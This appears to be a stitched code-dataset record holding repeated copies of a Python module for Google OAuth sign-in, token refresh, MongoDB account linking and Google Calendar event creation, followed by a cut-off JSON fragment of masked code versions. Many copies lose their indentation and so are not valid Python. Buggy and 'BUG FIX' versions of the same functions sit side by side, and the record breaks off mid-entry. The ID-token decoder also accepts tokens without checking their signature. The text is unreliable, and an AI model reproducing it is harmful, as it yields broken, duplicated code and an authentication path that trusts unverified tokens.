users_db.update_one({'_id': ObjectId(realid)}, {'$set': {
'connections.google': profile}, '$inc': {'connections.length':
0 if user else 1}})
print('add google info')
else:
users_db.insert_one({'connections': {'google': profile, 'length': 1}})
print('connect with google')
def refresh_token(refresh_token):
endpoint = 'https://oauth2.googleapis.com/token'
return requests.post(endpoint, {'client_id': client_id, 'client_secret':
settings.google.google_client_secret(), 'refresh_token':
refresh_token, 'grant_type': 'refresh_token'}).json()
def verify_access_token(access_token):
url = (
f'https://oauth2.googleapis.com/tokeninfo?access_token={access_token}')
return requests.get(url).status_code == 200
def get_access_token(google_user_id):
data = Just(users_db.find_one({'connections.google.sub': google_user_id}))
access_token = data.connections.google.access_token()
_refresh_token = data.connections.google.refresh_token()
assert _refresh_token
if access_token and verify_access_token(access_token):
return access_token
else:
return Just(refresh_token(_refresh_token)).access_token()
def get_real_user_id(user_id):
return str(users_db.find_one({'connections.google.sub': user_id})['_id'])
def get_google_user_id(real_user_id):
    """Return the stored Google `sub` for the Mongo user *real_user_id*.

    Raises RuntimeError when the user document or its google connection
    is absent.
    """
    data = Just(users_db.find_one({'_id': ObjectId(real_user_id)}))
    # BUG FIX: guard on the 'google' connection that is actually read
    # below; the original tested for 'line' instead.
    if data() and 'google' in data.connections():
        return data.connections.google.sub()
    else:
        raise RuntimeError
def add_event(real_user_id, start, end, options=None):
    """Insert an event on the user's primary Google calendar.

    start/end are dateTime strings interpreted in Asia/Tokyo. *options*
    is merged over the event body (defaults to empty summary and
    description). Returns True on HTTP 200; otherwise prints the
    response body and returns False.
    """
    # BUG FIX: a mutable dict default is shared across calls; build the
    # default per call instead.
    if options is None:
        options = {'summary': '', 'description': ''}
    endpoint = (
        'https://www.googleapis.com/calendar/v3/calendars/primary/events')
    d = {'end': {'dateTime': end, 'timeZone': 'Asia/Tokyo'}, 'start': {
        'dateTime': start, 'timeZone': 'Asia/Tokyo'}}
    d.update(options)
    res = requests.post(endpoint, json=d, headers={'content-type':
        'application/json', 'authorization':
        f'Bearer {get_access_token(get_google_user_id(real_user_id))}'})
    r = res.status_code == 200
    if not r:
        print(res.text)
    return r
<|reserved_special_token_1|>
<|reserved_special_token_0|>
isinpackage = not __name__ in ['google_api', '__main__']
if isinpackage:
from .settings import settings
from . import util
from .util import Just
from .db import get_collection
from . import certificate
else:
from settings import settings
from util import Just
from db import get_collection
users_db = get_collection('users')
client_id = settings.google.client_id()
redirect_uri = f'{settings.url_prefix()}/api/v1/oauth/google/redirect'
scope = urllib.parse.quote(settings.google.scope(), safe='')
access_type = settings.google.access_type()
prompt = settings.google.prompt()
response_type = settings.google.response_type()
def get_certs_keys(kid):
    """Return the Google JWKS cert entry whose 'kid' matches, or None."""
    url = 'https://www.googleapis.com/oauth2/v3/certs'
    data = requests.get(url).json()['keys']
    # BUG FIX: filter() requires its iterable argument; the original
    # one-argument call raised TypeError before next() could run.
    return next(filter(lambda e: kid == e['kid'], data), None)
def get_redirect_link(realid=None):
state = util.generate_id(50)
certificate.register_state(state, 'google_oauth', {'realid': realid})
return ('https://accounts.google.com/o/oauth2/v2/auth?' +
f'client_id={client_id}&' + f"include_granted_scopes={'true'}&" +
f'redirect_uri={redirect_uri}&' + f'scope={scope}&' +
f'access_type={access_type}&' + f'state={state}&' +
f'prompt={prompt}&' + f'response_type={response_type}')
def code_to_refresh_token(code):
endpoint = 'https://oauth2.googleapis.com/token'
tokens = requests.post(endpoint, {'code': code, 'client_id': client_id,
'client_secret': settings.google.google_client_secret(),
'redirect_uri': redirect_uri, 'grant_type': 'authorization_code'}
).json()
header, profile = decode_id_token(tokens['id_token'])
return profile, tokens
def decode_base64_padding(s):
return base64.urlsafe_b64decode(s + '=' * (-len(s) % 4)).decode()
def decode_id_token(id_token):
s = id_token.split('.')
header = json.loads(decode_base64_padding(s[0]))
payload = json.loads(decode_base64_padding(s[1]))
return header, payload
def register(profile, tokens, realid=None):
profile.update(tokens)
user = users_db.find_one({'_id': ObjectId(realid),
'connections.google.sub': profile['sub']})
if realid:
users_db.update_one({'_id': ObjectId(realid)}, {'$set': {
'connections.google': profile}, '$inc': {'connections.length':
0 if user else 1}})
print('add google info')
else:
users_db.insert_one({'connections': {'google': profile, 'length': 1}})
print('connect with google')
def refresh_token(refresh_token):
endpoint = 'https://oauth2.googleapis.com/token'
return requests.post(endpoint, {'client_id': client_id, 'client_secret':
settings.google.google_client_secret(), 'refresh_token':
refresh_token, 'grant_type': 'refresh_token'}).json()
def verify_access_token(access_token):
url = (
f'https://oauth2.googleapis.com/tokeninfo?access_token={access_token}')
return requests.get(url).status_code == 200
def get_access_token(google_user_id):
data = Just(users_db.find_one({'connections.google.sub': google_user_id}))
access_token = data.connections.google.access_token()
_refresh_token = data.connections.google.refresh_token()
assert _refresh_token
if access_token and verify_access_token(access_token):
return access_token
else:
return Just(refresh_token(_refresh_token)).access_token()
def get_real_user_id(user_id):
return str(users_db.find_one({'connections.google.sub': user_id})['_id'])
def get_google_user_id(real_user_id):
    """Return the stored Google `sub` for the Mongo user *real_user_id*.

    Raises RuntimeError when the user document or its google connection
    is absent.
    """
    data = Just(users_db.find_one({'_id': ObjectId(real_user_id)}))
    # BUG FIX: guard on the 'google' connection that is actually read
    # below; the original tested for 'line' instead.
    if data() and 'google' in data.connections():
        return data.connections.google.sub()
    else:
        raise RuntimeError
def add_event(real_user_id, start, end, options=None):
    """Insert an event on the user's primary Google calendar.

    start/end are dateTime strings interpreted in Asia/Tokyo. *options*
    is merged over the event body (defaults to empty summary and
    description). Returns True on HTTP 200; otherwise prints the
    response body and returns False.
    """
    # BUG FIX: a mutable dict default is shared across calls; build the
    # default per call instead.
    if options is None:
        options = {'summary': '', 'description': ''}
    endpoint = (
        'https://www.googleapis.com/calendar/v3/calendars/primary/events')
    d = {'end': {'dateTime': end, 'timeZone': 'Asia/Tokyo'}, 'start': {
        'dateTime': start, 'timeZone': 'Asia/Tokyo'}}
    d.update(options)
    res = requests.post(endpoint, json=d, headers={'content-type':
        'application/json', 'authorization':
        f'Bearer {get_access_token(get_google_user_id(real_user_id))}'})
    r = res.status_code == 200
    if not r:
        print(res.text)
    return r
<|reserved_special_token_1|>
import datetime
from datetime import datetime, timedelta
import time
import json
import base64
import requests
from bson.objectid import ObjectId
import urllib
isinpackage = not __name__ in ['google_api', '__main__']
if isinpackage:
from .settings import settings
from . import util
from .util import Just
from .db import get_collection
from . import certificate
else:
from settings import settings
from util import Just
from db import get_collection
users_db = get_collection('users')
client_id = settings.google.client_id()
redirect_uri = f'{settings.url_prefix()}/api/v1/oauth/google/redirect'
scope = urllib.parse.quote(settings.google.scope(), safe='')
access_type = settings.google.access_type()
prompt = settings.google.prompt()
response_type = settings.google.response_type()
def get_certs_keys(kid):
    """Return the Google JWKS cert entry whose 'kid' matches, or None."""
    url = 'https://www.googleapis.com/oauth2/v3/certs'
    data = requests.get(url).json()['keys']
    # BUG FIX: filter() requires its iterable argument; the original
    # one-argument call raised TypeError before next() could run.
    return next(filter(lambda e: kid == e['kid'], data), None)
def get_redirect_link(realid=None):
state = util.generate_id(50)
certificate.register_state(state, 'google_oauth', {'realid': realid})
return ('https://accounts.google.com/o/oauth2/v2/auth?' +
f'client_id={client_id}&' + f"include_granted_scopes={'true'}&" +
f'redirect_uri={redirect_uri}&' + f'scope={scope}&' +
f'access_type={access_type}&' + f'state={state}&' +
f'prompt={prompt}&' + f'response_type={response_type}')
def code_to_refresh_token(code):
endpoint = 'https://oauth2.googleapis.com/token'
tokens = requests.post(endpoint, {'code': code, 'client_id': client_id,
'client_secret': settings.google.google_client_secret(),
'redirect_uri': redirect_uri, 'grant_type': 'authorization_code'}
).json()
header, profile = decode_id_token(tokens['id_token'])
return profile, tokens
def decode_base64_padding(s):
return base64.urlsafe_b64decode(s + '=' * (-len(s) % 4)).decode()
def decode_id_token(id_token):
s = id_token.split('.')
header = json.loads(decode_base64_padding(s[0]))
payload = json.loads(decode_base64_padding(s[1]))
return header, payload
def register(profile, tokens, realid=None):
profile.update(tokens)
user = users_db.find_one({'_id': ObjectId(realid),
'connections.google.sub': profile['sub']})
if realid:
users_db.update_one({'_id': ObjectId(realid)}, {'$set': {
'connections.google': profile}, '$inc': {'connections.length':
0 if user else 1}})
print('add google info')
else:
users_db.insert_one({'connections': {'google': profile, 'length': 1}})
print('connect with google')
def refresh_token(refresh_token):
endpoint = 'https://oauth2.googleapis.com/token'
return requests.post(endpoint, {'client_id': client_id, 'client_secret':
settings.google.google_client_secret(), 'refresh_token':
refresh_token, 'grant_type': 'refresh_token'}).json()
def verify_access_token(access_token):
url = (
f'https://oauth2.googleapis.com/tokeninfo?access_token={access_token}')
return requests.get(url).status_code == 200
def get_access_token(google_user_id):
data = Just(users_db.find_one({'connections.google.sub': google_user_id}))
access_token = data.connections.google.access_token()
_refresh_token = data.connections.google.refresh_token()
assert _refresh_token
if access_token and verify_access_token(access_token):
return access_token
else:
return Just(refresh_token(_refresh_token)).access_token()
def get_real_user_id(user_id):
return str(users_db.find_one({'connections.google.sub': user_id})['_id'])
def get_google_user_id(real_user_id):
    """Return the stored Google `sub` for the Mongo user *real_user_id*.

    Raises RuntimeError when the user document or its google connection
    is absent.
    """
    data = Just(users_db.find_one({'_id': ObjectId(real_user_id)}))
    # BUG FIX: guard on the 'google' connection that is actually read
    # below; the original tested for 'line' instead.
    if data() and 'google' in data.connections():
        return data.connections.google.sub()
    else:
        raise RuntimeError
def add_event(real_user_id, start, end, options=None):
    """Insert an event on the user's primary Google calendar.

    start/end are dateTime strings interpreted in Asia/Tokyo. *options*
    is merged over the event body (defaults to empty summary and
    description). Returns True on HTTP 200; otherwise prints the
    response body and returns False.
    """
    # BUG FIX: a mutable dict default is shared across calls; build the
    # default per call instead.
    if options is None:
        options = {'summary': '', 'description': ''}
    endpoint = (
        'https://www.googleapis.com/calendar/v3/calendars/primary/events')
    d = {'end': {'dateTime': end, 'timeZone': 'Asia/Tokyo'}, 'start': {
        'dateTime': start, 'timeZone': 'Asia/Tokyo'}}
    d.update(options)
    res = requests.post(endpoint, json=d, headers={'content-type':
        'application/json', 'authorization':
        f'Bearer {get_access_token(get_google_user_id(real_user_id))}'})
    r = res.status_code == 200
    if not r:
        print(res.text)
    return r
<|reserved_special_token_1|>
import datetime
from datetime import datetime, timedelta
import time
import json
import base64
import requests
from bson.objectid import ObjectId
import urllib
isinpackage = not __name__ in ['google_api', '__main__']
if isinpackage:
from .settings import settings
from . import util
from .util import Just
from .db import get_collection
from .import certificate
else:
from settings import settings
# import util
from util import Just
from db import get_collection
# import certificate
users_db = get_collection('users')
client_id = settings.google.client_id()
redirect_uri = f'{settings.url_prefix()}/api/v1/oauth/google/redirect'
scope = urllib.parse.quote(settings.google.scope(), safe='')
access_type = settings.google.access_type()
prompt = settings.google.prompt()
response_type = settings.google.response_type()
def get_certs_keys(kid):
    """Return the Google JWKS certificate entry matching *kid*, or None.

    Fetches the key list from Google's OAuth2 certs endpoint and picks
    the entry whose 'kid' equals the requested key id.
    """
    url = 'https://www.googleapis.com/oauth2/v3/certs'
    data = requests.get(url).json()['keys']
    # BUG FIX: filter() requires its iterable argument; the original
    # one-argument call raised TypeError before next() could run.
    return next(filter(lambda e: kid == e['kid'], data), None)
def get_redirect_link(realid=None):
    """Build the Google OAuth2 consent-screen URL for this application.

    Registers a one-time `state` value (bound to *realid*) so the OAuth
    redirect handler can validate the callback later.
    """
    state = util.generate_id(50)
    certificate.register_state(state, "google_oauth", {"realid": realid})
    query_parts = (
        f"client_id={client_id}",
        f"include_granted_scopes={'true'}",
        f"redirect_uri={redirect_uri}",
        f"scope={scope}",
        f"access_type={access_type}",
        f"state={state}",
        f"prompt={prompt}",
        f"response_type={response_type}",
    )
    return 'https://accounts.google.com/o/oauth2/v2/auth?' + '&'.join(query_parts)
def code_to_refresh_token(code):
    """Exchange an OAuth2 authorization *code* for Google tokens.

    Returns (profile, tokens): the decoded id_token payload and the raw
    token response (access_token, refresh_token, id_token, ...).
    """
    request_body = {
        'code': code,
        'client_id': client_id,
        'client_secret': settings.google.google_client_secret(),
        'redirect_uri': redirect_uri,
        'grant_type': 'authorization_code',
    }
    tokens = requests.post('https://oauth2.googleapis.com/token',
                           request_body).json()
    _header, profile = decode_id_token(tokens['id_token'])
    return profile, tokens
def decode_base64_padding(s):
    """URL-safe base64-decode *s*, restoring any stripped '=' padding."""
    padding = '=' * (-len(s) % 4)
    return base64.urlsafe_b64decode(s + padding).decode()
def decode_id_token(id_token):
    """JSON-decode the header and payload segments of a JWT *id_token*.

    The signature segment is ignored; no cryptographic verification is
    performed here.
    """
    segments = id_token.split('.')
    header = json.loads(decode_base64_padding(segments[0]))
    payload = json.loads(decode_base64_padding(segments[1]))
    return header, payload
def register(profile, tokens, realid=None):
    """Persist a Google *profile* (merged with *tokens*) on a user doc.

    With *realid* the google connection is merged into that user,
    incrementing connections.length only when this google sub is new;
    without it a brand-new user document is created.
    """
    profile.update(tokens)
    existing = users_db.find_one({
        '_id': ObjectId(realid),
        'connections.google.sub': profile['sub'],
    })
    if not realid:
        users_db.insert_one({'connections': {'google': profile, 'length': 1}})
        print('connect with google')
        return
    length_delta = 0 if existing else 1
    users_db.update_one(
        {'_id': ObjectId(realid)},
        {
            '$set': {'connections.google': profile},
            '$inc': {'connections.length': length_delta},
        },
    )
    print('add google info')
def refresh_token(refresh_token):
    """POST a refresh_token grant to Google and return the JSON reply."""
    grant_body = {
        'client_id': client_id,
        'client_secret': settings.google.google_client_secret(),
        'refresh_token': refresh_token,
        'grant_type': 'refresh_token',
    }
    return requests.post('https://oauth2.googleapis.com/token',
                         grant_body).json()
def verify_access_token(access_token):
    """Return True iff Google's tokeninfo endpoint accepts *access_token*."""
    response = requests.get(
        'https://oauth2.googleapis.com/tokeninfo'
        f'?access_token={access_token}'
    )
    return response.status_code == 200
def get_access_token(google_user_id):
    """Return a valid Google access token for *google_user_id*.

    Re-uses the cached access token when tokeninfo still accepts it;
    otherwise performs a refresh-token grant. A stored refresh token is
    required (assert).
    """
    record = Just(users_db.find_one({'connections.google.sub': google_user_id}))
    cached_token = record.connections.google.access_token()
    stored_refresh = record.connections.google.refresh_token()
    assert stored_refresh
    if cached_token and verify_access_token(cached_token):
        return cached_token
    return Just(refresh_token(stored_refresh)).access_token()
def get_real_user_id(user_id):
    """Map a google sub (*user_id*) to the user's Mongo _id as a string."""
    doc = users_db.find_one({"connections.google.sub": user_id})
    return str(doc["_id"])
def get_google_user_id(real_user_id):
    """Return the stored Google `sub` for the Mongo user *real_user_id*.

    Raises RuntimeError when the user document or its google connection
    is absent.
    """
    data = Just(users_db.find_one({"_id": ObjectId(real_user_id)}))
    # BUG FIX: the original guarded on a 'line' connection but then read
    # the google one, so a google-only user raised RuntimeError while a
    # line-only user crashed on the missing google key. Guard on the
    # connection actually used.
    if data() and ('google' in data.connections()):
        return data.connections.google.sub()
    else:
        raise RuntimeError
def add_event(real_user_id, start, end, options=None):
    """Create an event on the user's primary Google calendar.

    *start*/*end* are dateTime strings interpreted in Asia/Tokyo.
    *options* is merged over the event body and defaults to an empty
    summary and description. Returns True on HTTP 200; otherwise prints
    the response body and returns False.
    """
    # BUG FIX: a mutable dict default is shared across calls; build the
    # default per call instead.
    if options is None:
        options = {'summary': '', 'description': ''}
    endpoint = 'https://www.googleapis.com/calendar/v3/calendars/primary/events'
    event_body = {
        'end': {
            'dateTime': end,
            'timeZone': 'Asia/Tokyo'
        },
        'start': {
            'dateTime': start,
            'timeZone': 'Asia/Tokyo'
        },
    }
    event_body.update(options)
    res = requests.post(endpoint, json=event_body, headers={
        'content-type': 'application/json',
        'authorization': f'Bearer {get_access_token(get_google_user_id(real_user_id))}'
    })
    ok = res.status_code == 200
    if not ok:
        print(res.text)
    return ok
|
flexible
|
{
"blob_id": "c75c69b006734e476352de1913fd4a58021bffd6",
"index": 2704,
"step-1": "<mask token>\n\n\ndef get_certs_keys(kid):\n url = 'https://www.googleapis.com/oauth2/v3/certs'\n data = requests.get(url).json()['keys']\n return next(filter(lambda e: kid == e['kid']), None)\n\n\ndef get_redirect_link(realid=None):\n state = util.generate_id(50)\n certificate.register_state(state, 'google_oauth', {'realid': realid})\n return ('https://accounts.google.com/o/oauth2/v2/auth?' +\n f'client_id={client_id}&' + f\"include_granted_scopes={'true'}&\" +\n f'redirect_uri={redirect_uri}&' + f'scope={scope}&' +\n f'access_type={access_type}&' + f'state={state}&' +\n f'prompt={prompt}&' + f'response_type={response_type}')\n\n\ndef code_to_refresh_token(code):\n endpoint = 'https://oauth2.googleapis.com/token'\n tokens = requests.post(endpoint, {'code': code, 'client_id': client_id,\n 'client_secret': settings.google.google_client_secret(),\n 'redirect_uri': redirect_uri, 'grant_type': 'authorization_code'}\n ).json()\n header, profile = decode_id_token(tokens['id_token'])\n return profile, tokens\n\n\ndef decode_base64_padding(s):\n return base64.urlsafe_b64decode(s + '=' * (-len(s) % 4)).decode()\n\n\n<mask token>\n\n\ndef register(profile, tokens, realid=None):\n profile.update(tokens)\n user = users_db.find_one({'_id': ObjectId(realid),\n 'connections.google.sub': profile['sub']})\n if realid:\n users_db.update_one({'_id': ObjectId(realid)}, {'$set': {\n 'connections.google': profile}, '$inc': {'connections.length': \n 0 if user else 1}})\n print('add google info')\n else:\n users_db.insert_one({'connections': {'google': profile, 'length': 1}})\n print('connect with google')\n\n\ndef refresh_token(refresh_token):\n endpoint = 'https://oauth2.googleapis.com/token'\n return requests.post(endpoint, {'client_id': client_id, 'client_secret':\n settings.google.google_client_secret(), 'refresh_token':\n refresh_token, 'grant_type': 'refresh_token'}).json()\n\n\ndef verify_access_token(access_token):\n url = (\n 
f'https://oauth2.googleapis.com/tokeninfo?access_token={access_token}')\n return requests.get(url).status_code == 200\n\n\ndef get_access_token(google_user_id):\n data = Just(users_db.find_one({'connections.google.sub': google_user_id}))\n access_token = data.connections.google.access_token()\n _refresh_token = data.connections.google.refresh_token()\n assert _refresh_token\n if access_token and verify_access_token(access_token):\n return access_token\n else:\n return Just(refresh_token(_refresh_token)).access_token()\n\n\ndef get_real_user_id(user_id):\n return str(users_db.find_one({'connections.google.sub': user_id})['_id'])\n\n\ndef get_google_user_id(real_user_id):\n data = Just(users_db.find_one({'_id': ObjectId(real_user_id)}))\n if data() and 'line' in data.connections():\n return data.connections.google.sub()\n else:\n raise RuntimeError\n\n\ndef add_event(real_user_id, start, end, options={'summary': '',\n 'description': ''}):\n endpoint = (\n 'https://www.googleapis.com/calendar/v3/calendars/primary/events')\n d = {'end': {'dateTime': end, 'timeZone': 'Asia/Tokyo'}, 'start': {\n 'dateTime': start, 'timeZone': 'Asia/Tokyo'}}\n d.update(options)\n res = requests.post(endpoint, json=d, headers={'content-type':\n 'application/json', 'authorization':\n f'Bearer {get_access_token(get_google_user_id(real_user_id))}'})\n r = res.status_code == 200\n if not r:\n print(res.text)\n return r\n",
"step-2": "<mask token>\n\n\ndef get_certs_keys(kid):\n url = 'https://www.googleapis.com/oauth2/v3/certs'\n data = requests.get(url).json()['keys']\n return next(filter(lambda e: kid == e['kid']), None)\n\n\ndef get_redirect_link(realid=None):\n state = util.generate_id(50)\n certificate.register_state(state, 'google_oauth', {'realid': realid})\n return ('https://accounts.google.com/o/oauth2/v2/auth?' +\n f'client_id={client_id}&' + f\"include_granted_scopes={'true'}&\" +\n f'redirect_uri={redirect_uri}&' + f'scope={scope}&' +\n f'access_type={access_type}&' + f'state={state}&' +\n f'prompt={prompt}&' + f'response_type={response_type}')\n\n\ndef code_to_refresh_token(code):\n endpoint = 'https://oauth2.googleapis.com/token'\n tokens = requests.post(endpoint, {'code': code, 'client_id': client_id,\n 'client_secret': settings.google.google_client_secret(),\n 'redirect_uri': redirect_uri, 'grant_type': 'authorization_code'}\n ).json()\n header, profile = decode_id_token(tokens['id_token'])\n return profile, tokens\n\n\ndef decode_base64_padding(s):\n return base64.urlsafe_b64decode(s + '=' * (-len(s) % 4)).decode()\n\n\ndef decode_id_token(id_token):\n s = id_token.split('.')\n header = json.loads(decode_base64_padding(s[0]))\n payload = json.loads(decode_base64_padding(s[1]))\n return header, payload\n\n\ndef register(profile, tokens, realid=None):\n profile.update(tokens)\n user = users_db.find_one({'_id': ObjectId(realid),\n 'connections.google.sub': profile['sub']})\n if realid:\n users_db.update_one({'_id': ObjectId(realid)}, {'$set': {\n 'connections.google': profile}, '$inc': {'connections.length': \n 0 if user else 1}})\n print('add google info')\n else:\n users_db.insert_one({'connections': {'google': profile, 'length': 1}})\n print('connect with google')\n\n\ndef refresh_token(refresh_token):\n endpoint = 'https://oauth2.googleapis.com/token'\n return requests.post(endpoint, {'client_id': client_id, 'client_secret':\n settings.google.google_client_secret(), 
'refresh_token':\n refresh_token, 'grant_type': 'refresh_token'}).json()\n\n\ndef verify_access_token(access_token):\n url = (\n f'https://oauth2.googleapis.com/tokeninfo?access_token={access_token}')\n return requests.get(url).status_code == 200\n\n\ndef get_access_token(google_user_id):\n data = Just(users_db.find_one({'connections.google.sub': google_user_id}))\n access_token = data.connections.google.access_token()\n _refresh_token = data.connections.google.refresh_token()\n assert _refresh_token\n if access_token and verify_access_token(access_token):\n return access_token\n else:\n return Just(refresh_token(_refresh_token)).access_token()\n\n\ndef get_real_user_id(user_id):\n return str(users_db.find_one({'connections.google.sub': user_id})['_id'])\n\n\ndef get_google_user_id(real_user_id):\n data = Just(users_db.find_one({'_id': ObjectId(real_user_id)}))\n if data() and 'line' in data.connections():\n return data.connections.google.sub()\n else:\n raise RuntimeError\n\n\ndef add_event(real_user_id, start, end, options={'summary': '',\n 'description': ''}):\n endpoint = (\n 'https://www.googleapis.com/calendar/v3/calendars/primary/events')\n d = {'end': {'dateTime': end, 'timeZone': 'Asia/Tokyo'}, 'start': {\n 'dateTime': start, 'timeZone': 'Asia/Tokyo'}}\n d.update(options)\n res = requests.post(endpoint, json=d, headers={'content-type':\n 'application/json', 'authorization':\n f'Bearer {get_access_token(get_google_user_id(real_user_id))}'})\n r = res.status_code == 200\n if not r:\n print(res.text)\n return r\n",
"step-3": "<mask token>\nisinpackage = not __name__ in ['google_api', '__main__']\nif isinpackage:\n from .settings import settings\n from . import util\n from .util import Just\n from .db import get_collection\n from . import certificate\nelse:\n from settings import settings\n from util import Just\n from db import get_collection\nusers_db = get_collection('users')\nclient_id = settings.google.client_id()\nredirect_uri = f'{settings.url_prefix()}/api/v1/oauth/google/redirect'\nscope = urllib.parse.quote(settings.google.scope(), safe='')\naccess_type = settings.google.access_type()\nprompt = settings.google.prompt()\nresponse_type = settings.google.response_type()\n\n\ndef get_certs_keys(kid):\n url = 'https://www.googleapis.com/oauth2/v3/certs'\n data = requests.get(url).json()['keys']\n return next(filter(lambda e: kid == e['kid']), None)\n\n\ndef get_redirect_link(realid=None):\n state = util.generate_id(50)\n certificate.register_state(state, 'google_oauth', {'realid': realid})\n return ('https://accounts.google.com/o/oauth2/v2/auth?' 
+\n f'client_id={client_id}&' + f\"include_granted_scopes={'true'}&\" +\n f'redirect_uri={redirect_uri}&' + f'scope={scope}&' +\n f'access_type={access_type}&' + f'state={state}&' +\n f'prompt={prompt}&' + f'response_type={response_type}')\n\n\ndef code_to_refresh_token(code):\n endpoint = 'https://oauth2.googleapis.com/token'\n tokens = requests.post(endpoint, {'code': code, 'client_id': client_id,\n 'client_secret': settings.google.google_client_secret(),\n 'redirect_uri': redirect_uri, 'grant_type': 'authorization_code'}\n ).json()\n header, profile = decode_id_token(tokens['id_token'])\n return profile, tokens\n\n\ndef decode_base64_padding(s):\n return base64.urlsafe_b64decode(s + '=' * (-len(s) % 4)).decode()\n\n\ndef decode_id_token(id_token):\n s = id_token.split('.')\n header = json.loads(decode_base64_padding(s[0]))\n payload = json.loads(decode_base64_padding(s[1]))\n return header, payload\n\n\ndef register(profile, tokens, realid=None):\n profile.update(tokens)\n user = users_db.find_one({'_id': ObjectId(realid),\n 'connections.google.sub': profile['sub']})\n if realid:\n users_db.update_one({'_id': ObjectId(realid)}, {'$set': {\n 'connections.google': profile}, '$inc': {'connections.length': \n 0 if user else 1}})\n print('add google info')\n else:\n users_db.insert_one({'connections': {'google': profile, 'length': 1}})\n print('connect with google')\n\n\ndef refresh_token(refresh_token):\n endpoint = 'https://oauth2.googleapis.com/token'\n return requests.post(endpoint, {'client_id': client_id, 'client_secret':\n settings.google.google_client_secret(), 'refresh_token':\n refresh_token, 'grant_type': 'refresh_token'}).json()\n\n\ndef verify_access_token(access_token):\n url = (\n f'https://oauth2.googleapis.com/tokeninfo?access_token={access_token}')\n return requests.get(url).status_code == 200\n\n\ndef get_access_token(google_user_id):\n data = Just(users_db.find_one({'connections.google.sub': google_user_id}))\n access_token = 
data.connections.google.access_token()\n _refresh_token = data.connections.google.refresh_token()\n assert _refresh_token\n if access_token and verify_access_token(access_token):\n return access_token\n else:\n return Just(refresh_token(_refresh_token)).access_token()\n\n\ndef get_real_user_id(user_id):\n return str(users_db.find_one({'connections.google.sub': user_id})['_id'])\n\n\ndef get_google_user_id(real_user_id):\n data = Just(users_db.find_one({'_id': ObjectId(real_user_id)}))\n if data() and 'line' in data.connections():\n return data.connections.google.sub()\n else:\n raise RuntimeError\n\n\ndef add_event(real_user_id, start, end, options={'summary': '',\n 'description': ''}):\n endpoint = (\n 'https://www.googleapis.com/calendar/v3/calendars/primary/events')\n d = {'end': {'dateTime': end, 'timeZone': 'Asia/Tokyo'}, 'start': {\n 'dateTime': start, 'timeZone': 'Asia/Tokyo'}}\n d.update(options)\n res = requests.post(endpoint, json=d, headers={'content-type':\n 'application/json', 'authorization':\n f'Bearer {get_access_token(get_google_user_id(real_user_id))}'})\n r = res.status_code == 200\n if not r:\n print(res.text)\n return r\n",
"step-4": "import datetime\nfrom datetime import datetime, timedelta\nimport time\nimport json\nimport base64\nimport requests\nfrom bson.objectid import ObjectId\nimport urllib\nisinpackage = not __name__ in ['google_api', '__main__']\nif isinpackage:\n from .settings import settings\n from . import util\n from .util import Just\n from .db import get_collection\n from . import certificate\nelse:\n from settings import settings\n from util import Just\n from db import get_collection\nusers_db = get_collection('users')\nclient_id = settings.google.client_id()\nredirect_uri = f'{settings.url_prefix()}/api/v1/oauth/google/redirect'\nscope = urllib.parse.quote(settings.google.scope(), safe='')\naccess_type = settings.google.access_type()\nprompt = settings.google.prompt()\nresponse_type = settings.google.response_type()\n\n\ndef get_certs_keys(kid):\n url = 'https://www.googleapis.com/oauth2/v3/certs'\n data = requests.get(url).json()['keys']\n return next(filter(lambda e: kid == e['kid']), None)\n\n\ndef get_redirect_link(realid=None):\n state = util.generate_id(50)\n certificate.register_state(state, 'google_oauth', {'realid': realid})\n return ('https://accounts.google.com/o/oauth2/v2/auth?' 
+\n f'client_id={client_id}&' + f\"include_granted_scopes={'true'}&\" +\n f'redirect_uri={redirect_uri}&' + f'scope={scope}&' +\n f'access_type={access_type}&' + f'state={state}&' +\n f'prompt={prompt}&' + f'response_type={response_type}')\n\n\ndef code_to_refresh_token(code):\n endpoint = 'https://oauth2.googleapis.com/token'\n tokens = requests.post(endpoint, {'code': code, 'client_id': client_id,\n 'client_secret': settings.google.google_client_secret(),\n 'redirect_uri': redirect_uri, 'grant_type': 'authorization_code'}\n ).json()\n header, profile = decode_id_token(tokens['id_token'])\n return profile, tokens\n\n\ndef decode_base64_padding(s):\n return base64.urlsafe_b64decode(s + '=' * (-len(s) % 4)).decode()\n\n\ndef decode_id_token(id_token):\n s = id_token.split('.')\n header = json.loads(decode_base64_padding(s[0]))\n payload = json.loads(decode_base64_padding(s[1]))\n return header, payload\n\n\ndef register(profile, tokens, realid=None):\n profile.update(tokens)\n user = users_db.find_one({'_id': ObjectId(realid),\n 'connections.google.sub': profile['sub']})\n if realid:\n users_db.update_one({'_id': ObjectId(realid)}, {'$set': {\n 'connections.google': profile}, '$inc': {'connections.length': \n 0 if user else 1}})\n print('add google info')\n else:\n users_db.insert_one({'connections': {'google': profile, 'length': 1}})\n print('connect with google')\n\n\ndef refresh_token(refresh_token):\n endpoint = 'https://oauth2.googleapis.com/token'\n return requests.post(endpoint, {'client_id': client_id, 'client_secret':\n settings.google.google_client_secret(), 'refresh_token':\n refresh_token, 'grant_type': 'refresh_token'}).json()\n\n\ndef verify_access_token(access_token):\n url = (\n f'https://oauth2.googleapis.com/tokeninfo?access_token={access_token}')\n return requests.get(url).status_code == 200\n\n\ndef get_access_token(google_user_id):\n data = Just(users_db.find_one({'connections.google.sub': google_user_id}))\n access_token = 
data.connections.google.access_token()\n _refresh_token = data.connections.google.refresh_token()\n assert _refresh_token\n if access_token and verify_access_token(access_token):\n return access_token\n else:\n return Just(refresh_token(_refresh_token)).access_token()\n\n\ndef get_real_user_id(user_id):\n return str(users_db.find_one({'connections.google.sub': user_id})['_id'])\n\n\ndef get_google_user_id(real_user_id):\n data = Just(users_db.find_one({'_id': ObjectId(real_user_id)}))\n if data() and 'line' in data.connections():\n return data.connections.google.sub()\n else:\n raise RuntimeError\n\n\ndef add_event(real_user_id, start, end, options={'summary': '',\n 'description': ''}):\n endpoint = (\n 'https://www.googleapis.com/calendar/v3/calendars/primary/events')\n d = {'end': {'dateTime': end, 'timeZone': 'Asia/Tokyo'}, 'start': {\n 'dateTime': start, 'timeZone': 'Asia/Tokyo'}}\n d.update(options)\n res = requests.post(endpoint, json=d, headers={'content-type':\n 'application/json', 'authorization':\n f'Bearer {get_access_token(get_google_user_id(real_user_id))}'})\n r = res.status_code == 200\n if not r:\n print(res.text)\n return r\n",
